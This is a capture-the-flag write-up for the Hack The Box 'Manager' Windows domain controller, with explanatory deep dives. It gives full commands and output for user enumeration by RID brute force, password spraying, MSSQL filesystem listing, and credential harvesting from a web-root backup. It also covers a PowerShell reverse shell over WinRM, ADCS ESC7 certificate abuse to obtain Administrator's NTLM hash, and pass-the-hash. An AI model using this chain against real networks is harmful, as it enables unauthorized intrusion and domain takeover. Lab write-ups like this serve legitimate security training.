HTB - Manager
Target IP: 10.129.8.181
Domain: manager.htb
DC Hostname: DC01.manager.htb
OS: Windows Server 2019 (Domain Controller)
Difficulty: Medium
Author: [g1nt0n1c]
1. Phase 1: Reconnaissance & Information Gathering
1.1 TCP Port Discovery
# Fast full-port sweep to identify all open ports before deeper scanning
nmap -p- --min-rate 10000 10.10.11.236
# Targeted version + script scan on identified ports
nmap -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -sCV 10.10.11.236Port Analysis & Attack Surface
| Port | Service | Notes |
|---|---|---|
| 80/tcp | IIS 10.0 | Corporate website — could host files or expose the webroot |
| 88/tcp | Kerberos | Domain Controller confirmed |
| 389/tcp | LDAP | Domain: manager.htb, DC: dc01.manager.htb |
| 445/tcp | SMB | Null Auth enabled per nxc probe — worth enumerating |
| 1433/tcp | MSSQL | High value — SQL Server 15.00.2000.00; separate attack surface |
| 5985/tcp | WinRM | Remote shell entry point if valid credentials found |
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos
389/tcp open ldap Microsoft Windows AD LDAP (Domain: manager.htb)
| ssl-cert: Subject: commonName=dc01.manager.htb
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
5985/tcp open http Microsoft HTTPAPI httpd 2.0
Service Info: Host: DC01; OS: Windows
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
Key observations:
- SMB signing is required — relay attacks blocked.
- Port 1433 (MSSQL) is rare on a DC — a separate, high-value entry point.
Null Auth: Trueon SMB means we can attempt unauthenticated enumeration.
1.2 Local Host Resolution
# Add DC hostname, FQDN, and short domain — all needed for various tools
echo "10.129.8.181 DC01.manager.htb manager.htb DC01" | sudo tee -a /etc/hosts2. Phase 2: SMB Enumeration & User Discovery
2.1 Probe SMB Authentication
# Quick SMB probe — confirms domain, build, and null auth status
nxc smb 10.129.8.181
# SMB DC01 [*] Windows 10 / Server 2019 Build 17763 (domain:manager.htb) (signing:True) (Null Auth:True)2.2 Enumerate Shares via Null and Guest Sessions
# Null session — anonymous bind
nxc smb 10.129.8.181 -u '' -p '' --shares
# [-] STATUS_ACCESS_DENIED
# Guest session — unauthenticated user account
nxc smb 10.129.8.181 -u 'guest' -p '' --shares
# IPC$ READ Remote IPC (only readable share)No useful shares via guest. Move on to user enumeration.
2.3 Enumerate Domain Users
Two methods — --users queries the directory API; --rid-brute brute-forces Relative Identifiers over SMB and works even without directory read permissions.
# Method 1: directory query (requires more permissions — empty here)
nxc smb 10.129.8.181 -u 'guest' -p '' --users
# Method 2: RID brute-force — walks RID 500–2000+ and resolves each SID to a name
nxc smb 10.129.8.181 -u 'guest' -p '' --rid-bruteKey finding — custom users (RID > 1000):
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)
RIDs above 1000 are custom-created accounts; below 1000 are built-in (Administrator = 500, Guest = 501).
2.4 Build Username List and Password Spray
Save discovered users, then spray username:username — a common weak-password pattern for service and operator accounts.
# Save usernames to file
cat > usernames.txt << EOF
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator
EOF
# Lowercase all names (AD is case-insensitive, but tools may not be)
cat usernames.txt | tr '[:upper:]' '[:lower:]' > lower-usernames.txt
# Spray: --no-bruteforce pairs row 1 of userlist with row 1 of passlist (no cross-product)
# --continue-on-success keeps testing even after a hit
nxc smb 10.129.8.181 -u lower-usernames.txt -p lower-usernames.txt --no-bruteforce --continue-on-success
# [+] manager.htb\operator:operator3. Phase 3: MSSQL Enumeration & File Disclosure
3.1 Validate Credentials Against MSSQL
# Confirm operator works on the SQL service too
nxc mssql manager.htb -u operator -p operator
# [+] manager.htb\operator:operator3.2 Connect to MSSQL
# -windows-auth: authenticate using Windows/Kerberos, not SQL Server auth
mssqlclient.py -windows-auth manager.htb/operator:operator@manager.htb3.3 Attempt Command Execution
-- Try to run OS commands via the built-in stored procedure
xp_cmdshell whoami
-- ERROR: EXECUTE permission was denied on 'xp_cmdshell'
-- Try to enable it — also blocked
enable_xp_cmdshell
-- ERROR: You do not have permission to run the RECONFIGURE statement.xp_cmdshell is disabled and we cannot re-enable it. Fall back to filesystem enumeration.
3.4 Enumerate the Filesystem via xp_dirtree
xp_dirtree lists directories and files without executing commands. It runs in the SQL Server service context and can read any path the service account can access.
-- List the C:\ root to identify interesting directories
xp_dirtree C:\
-- inetpub 1 0 <= IIS web root
-- Enumerate the IIS web root
xp_dirtree C:\inetpub\wwwroot
-- about.html 1 1
-- index.html 1 1
-- web.config 1 1
-- website-backup-27-07-23-old.zip 1 1 <= INTERESTINGC:\inetpub\wwwroot is the IIS web root — any file listed there is directly downloadable via HTTP.
3.5 Download the Backup Archive
Since the file is in the web root, download it directly via HTTP:
# Download the backup from the web server
wget http://10.129.8.181/website-backup-27-07-23-old.zip
unzip website-backup-27-07-23-old.zip -d backup/3.6 Search for Credentials in the Backup
# Show all files including hidden ones (-a flag)
tree -a backup/
# ├── .old-conf.xml ← hidden config file
# Recursively search for the word "password" (case-insensitive)
grep -ri password backup/
# .old-conf.xml: <password>R4v3nBe5tD3veloP3r!123</password><!-- .old-conf.xml -->
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>4. Phase 4: Initial Access (WinRM as raven)
4.1 Validate Credentials
nxc winrm 10.129.8.181 -u raven -p 'R4v3nBe5tD3veloP3r!123'
# [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)4.2 Open Reverse Shell
Generate a Base64 PowerShell reverse shell at revshells.com and execute via WinRM.
# Start listener
rlwrap nc -lvnp 4444
# Execute reverse shell payload
nxc winrm 10.129.8.181 -u raven -p 'R4v3nBe5tD3veloP3r!123' -X "powershell -e JABjAGw..."
# whoami
# manager\raven5. Phase 5: Privilege Escalation (ADCS ESC7 → Domain Admin)
5.1 Enumerate Active Directory Certificate Services
certipy enumerates all Certificate Authorities and templates, flagging known misconfigurations (ESC1–ESC11).
# -vulnerable: only show exploitable findings | -stdout: print to terminal
certipy find -dc-ip 10.129.8.181 -ns 10.129.8.181 \
-u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' \
-vulnerable -stdoutKey finding:
CA Name : manager-DC01-CA
Permissions
ManageCA : MANAGER.HTB\Raven ← raven can manage the CA itself
[!] Vulnerabilities
ESC7 : User has dangerous permissions.
Raven has ManageCA on the root CA — this is ESC7.
5.2 Exploit ESC7 — Self-Approval Attack
ESC7 is a four-step attack: escalate your own CA permissions → request a restricted cert → approve it yourself → authenticate as Administrator.
Step 1 — Grant raven the ManageCertificates right (Officer role)
ManageCA allows modifying CA settings, including adding Officers (Certificate Managers who can approve pending requests).
certipy ca -ca manager-DC01-CA \
-add-officer raven \
-username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' \
-dc-ip 10.129.8.181
# [*] Successfully added officer 'Raven' on 'manager-DC01-CA'Step 2 — Request a SubCA certificate for Administrator
The SubCA template is restricted — raven cannot enroll directly. The CA accepts the request but holds it in Pending state. We save the private key for later.
certipy req -ca manager-DC01-CA \
-target dc01.manager.htb \
-template SubCA \
-upn administrator@manager.htb \
-username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' \
-dc-ip 10.129.8.181
# [*] Request ID is 24
# [-] CERTSRV_E_TEMPLATE_DENIED (expected — request is pending)
# [*] Saving private key to '24.key'Step 3 — Approve the pending request using Officer rights
certipy ca -ca manager-DC01-CA \
-issue-request 24 \
-username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' \
-dc-ip 10.129.8.181
# [*] Successfully issued certificate request ID 24Step 4 — Retrieve the issued certificate
certipy req -ca manager-DC01-CA \
-target dc01.manager.htb \
-retrieve 24 \
-username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' \
-dc-ip 10.129.8.181
# [*] Got certificate with UPN 'administrator@manager.htb'
# [*] Saving certificate and private key to 'administrator.pfx'5.3 Authenticate as Administrator and Retrieve NTLM Hash
In AD, a certificate can be exchanged for a Kerberos TGT via PKINIT. Certipy performs this exchange and additionally extracts the NTLM hash from the TGT’s PAC.
certipy auth -pfx administrator.pfx -dc-ip 10.129.8.181
# [*] Got TGT
# [*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef5.4 Pass the Hash — Validate Domain Admin Access
# Use the NT hash directly — no password needed
nxc smb 10.129.8.181 -u administrator -H ae5064c2f62317332c88629e025924ef
# [+] manager.htb\administrator:ae5064c2f62317332c88629e025924ef (Pwn3d!)Deep Dive: RID Brute-Force User Enumeration
Every security principal in Windows has a Security Identifier (SID) in the format S-1-5-21-<domain>-<RID>. The RID (Relative Identifier) is a sequential number: 500 = Administrator, 501 = Guest, 1000+ = custom accounts. By requesting the name that maps to each RID over SMB’s lsarpc named pipe, we can enumerate all user and group accounts without any directory read permissions — guest-level SMB access is sufficient.
Deep Dive: MSSQL xp_dirtree as a Recon Tool
xp_dirtree is a built-in MSSQL stored procedure designed for legitimate filesystem operations. It runs in the security context of the SQL Server service account, which often has broad local read access. Even when xp_cmdshell is locked down, xp_dirtree frequently remains available. It can enumerate any local path and also resolve UNC paths (\\host\share) — the latter can be used to coerce NTLM authentication (similar to Responder) by pointing it at a controlled host.
Deep Dive: ADCS ESC7 — CA Permission Abuse
Most ADCS attacks (ESC1, ESC3) target misconfigured certificate templates. ESC7 is different — it targets misconfigured permissions on the Certificate Authority object itself.
The CA ACL has two dangerous rights:
- ManageCA — modify CA configuration, including adding Officers
- ManageCertificates (Officer) — approve or deny pending certificate requests
If a low-privileged user holds ManageCA, they can elevate to ManageCertificates by adding themselves as an Officer. With both rights, they can:
- Request a certificate from any template — even restricted ones like
SubCA - Self-approve the pending request
- Use the resulting certificate to authenticate as any user (including Domain Admin) via PKINIT
The certificate is then exchanged for a Kerberos TGT, from which the target’s NTLM hash is extracted. This enables Pass-the-Hash without ever knowing the plaintext password.
Key Takeaways & Checklist
Things to always try:
- When
Null Auth: Truein nxc, test both-u ''and-u 'guest'with-p '' - If
--usersreturns nothing, fall back to--rid-brute - Password spray
username:username(both original and lowercase) - If MSSQL is open, connect with
mssqlclient.py— even withoutxp_cmdshell,xp_dirtreegives filesystem visibility C:\inetpub\wwwrootis the IIS web root — files there are directly downloadable via HTTP- Always use
tree -ato reveal hidden files (dotfiles) - Use
grep -ri passwordto hunt for credentials in any downloaded archive or directory - Run
certipy find -vulnerablewhenever you have valid domain credentials — ADCS misconfigs are common and often lead directly to DA